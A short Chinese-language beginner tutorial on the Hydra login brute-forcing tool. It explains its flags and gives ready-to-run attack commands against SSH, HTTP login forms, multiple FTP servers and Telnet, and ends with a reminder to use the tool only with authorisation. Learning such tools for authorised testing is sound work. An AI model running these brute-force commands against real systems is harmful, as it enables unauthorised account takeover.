1. Hydra 简介
Hydra是一款强大的网络登录暴力破解工具,支持多种协议。本教程将帮助新手快速上手,掌握常用指令和操作。
2. 基本语法
hydra [参数] 目标3. 核心参数详解
3.1 用户名和密码设置
-
单个用户名:
-l LOGIN例:-l admin -
用户名列表:
-L FILE例:-L users.txt -
单个密码:
-p PASS例:-p 123456 -
密码列表:
-P FILE例:-P passwords.txt
记忆技巧:小写l/p单个,大写L/P多个(列表)
3.2 目标设置
-
单一目标:直接在命令末尾指定 例:
ssh://192.168.1.100 -
多目标文件:
-M FILE例:-M targets.txt -
非默认端口:
-s PORT例:-s 8080
记忆技巧:M for Multiple(多个),s for specific port(特定端口)
3.3 任务控制
-
线程数:
-t TASKS例:-t 16(默认值) -
输出文件:
-o FILE例:-o results.txt -
找到后停止:
-f:停止当前目标-F:停止所有目标
记忆技巧:t for threads,o for output,f/F for found(找到)
3.4 高级选项
-
扩展尝试:
-e nsrn: 空密码 s: 用户名作密码 r: 反转用户名作密码 -
用户名:密码组合文件:
-C FILE例:-C combos.txt -
密码生成:
-x MIN:MAX:CHARSET例:-x 3:6:abcdef
记忆技巧:e for extend,C for combination,x for generate
4. 常用攻击示例
4.1 SSH攻击
hydra -l root -P passwords.txt ssh://192.168.1.100解析:使用用户名"root"和密码列表尝试SSH登录
4.2 HTTP表单攻击
hydra -L users.txt -P passwords.txt 192.168.1.100 http-post-form
"/login.php:username=^USER^&password=^PASS^:F=登录失败"解析:尝试HTTP表单登录,检测"登录失败"字样判断失败
4.3 多目标FTP攻击
hydra -L users.txt -P passwords.txt -M ftpservers.txt ftp解析:对多个FTP服务器进行批量攻击
4.4 指定端口的Telnet攻击
hydra -l admin -x 3:3:a1% telnet://192.168.1.100 -s 2323解析:使用生成的3位密码攻击2323端口的Telnet服务
5. 快速记忆要点
- 用户名/密码:-l/-L, -p/-P
- 目标:单个直接写,多个用-M
- 端口:-s指定非默认端口
- 任务控制:-t线程,-o输出,-f/-F找到停止
- 高级:-e扩展,-C组合,-x生成密码
6. 安全提示
请确保在合法授权的情况下使用Hydra,未经允许的渗透测试可能违法。
